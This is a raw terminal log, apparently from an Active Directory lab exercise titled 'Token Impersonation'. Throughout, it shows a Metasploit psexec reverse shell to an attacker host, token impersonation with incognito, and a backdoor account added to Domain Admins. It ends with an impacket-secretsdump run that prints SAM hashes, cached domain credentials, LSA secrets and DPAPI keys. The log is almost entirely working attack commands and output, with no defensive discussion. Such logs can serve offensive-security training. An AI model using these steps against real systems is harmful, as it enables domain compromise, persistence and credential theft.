Token Impersonation

msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 192.168.145.141:4444 
[*] 192.168.145.139:445 - Connecting to the server...
[*] 192.168.145.139:445 - Authenticating to 192.168.145.139:445|MARVEL.local as user 'fcastle'...
[*] 192.168.145.139:445 - Selecting PowerShell target
[*] 192.168.145.139:445 - Executing the payload...
[+] 192.168.145.139:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (201798 bytes) to 192.168.145.139
[*] Meterpreter session 1 opened (192.168.145.141:4444 -> 192.168.145.139:64070) at 2025-05-21 05:13:13 -0400

meterpreter > 

load incognito

meterpreter > list_tokens -u

Delegation Tokens Available
========================================
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
MARVEL\fcastle
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Window Manager\DWM-1

Impersonation Tokens Available
========================================
No tokens available

meterpreter > list_tokens -g

Delegation Tokens Available
========================================
\
\Authentication authority asserted identity
BUILTIN\Administrators
BUILTIN\Users
MARVEL\Domain Users
NT AUTHORITY\Authenticated Users
NT AUTHORITY\INTERACTIVE
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\LogonSessionId_0_101431
NT AUTHORITY\LogonSessionId_0_103458

meterpreter > impersonate_token marvel\\fcastle
[+] Delegation token available
[+] Successfully impersonated user MARVEL\fcastle
meterpreter > shell
Process 7828 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.2006]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
marvel\fcastle

C:\Windows\system32>

C:\Windows\system32>net user /add hawkeye Password1@ /domain
net user /add hawkeye Password1@ /domain
The request will be processed at a domain controller for domain MARVEL.local.

The command completed successfully.


C:\Windows\system32>net group "Domain Admins" hawkeye /ADD /DOMAIN
net group "Domain Admins" hawkeye /ADD /DOMAIN
The request will be processed at a domain controller for domain MARVEL.local.

The command completed successfully.


C:\Windows\system32>

┌──(kali㉿kali)-[~]
└─$ impacket-secretsdump 'MARVEL.local/hawkeye:Password1@@192.168.145.139'

Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xec9be313e502a2aa71fd4e8e4c9999d5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6578f05068adb3e4a16d3253bd46bacb:::
frankcastle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
[*] Dumping cached domain logon information (domain/username:hash)
MARVEL.LOCAL/fcastle:$DCC2$10240#fcastle#e6f48c2526bd594441d3da3723155f6f: (2025-05-21 09:14:56)
MARVEL.LOCAL/Administrator:$DCC2$10240#Administrator#c7154f935b7d1ace4c1d72bd4fb7889c: (2025-05-21 09:26:34)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
MARVEL\THEPUNISHER$:aes256-cts-hmac-sha1-96:6a98901004c69df5467cd869f4ea7c1f0e5f3d8848a9549a5aa9b7ba3b3150e4
MARVEL\THEPUNISHER$:aes128-cts-hmac-sha1-96:ec537eb458177012db5ab7997afd825b
MARVEL\THEPUNISHER$:des-cbc-md5:cd4af415fb927af4
MARVEL\THEPUNISHER$:plain_password_hex:660056004b006300470078004000550048004f00570027007200250059002c002600720020006c00500024005e003a005900580058004e005d006700750041002c002d00590030004400640043002f0037007000480065004400660044005600670067005f00290068007a00570037006a002a003200330075003e00750066004400320064007100700035003600710059003d004f00580055005d0065003d0051002f0059006e00690029002f00590020002d006100270069002c003700550047003500570030005d0056002e00780074004e007a003900450071003f0072006e0045004200300058002c0028006f00
MARVEL\THEPUNISHER$:aad3b435b51404eeaad3b435b51404ee:b5458f32b6a10e8482ae7a582f776ab0:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x6174875d29cb646655e1dd49c2853691667f78f2
dpapi_userkey:0xa4d2daa834d71945360ce5b8ac5efcf2a02a9c28
[*] NL$KM 
 0000   09 9F C6 F6 60 EF 09 3E  30 CC 5B AA C7 AC 5A FB   ....`..>0.[...Z.
 0010   CA 61 47 50 2D 62 B1 36  D6 59 69 2F 82 CB 81 DE   .aGP-b.6.Yi/....
 0020   D8 20 BF 99 BA 90 0C 47  10 9E 8E CB F5 01 E2 F0   . .....G........
 0030   0C 9C FC 1A BF AD 66 7B  03 11 DA A4 DF CD 60 63   ......f{......`c
NL$KM:099fc6f660ef093e30cc5baac7ac5afbca6147502d62b136d659692f82cb81ded820bf99ba900c47109e8ecbf501e2f00c9cfc1abfad667b0311daa4dfcd6063
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry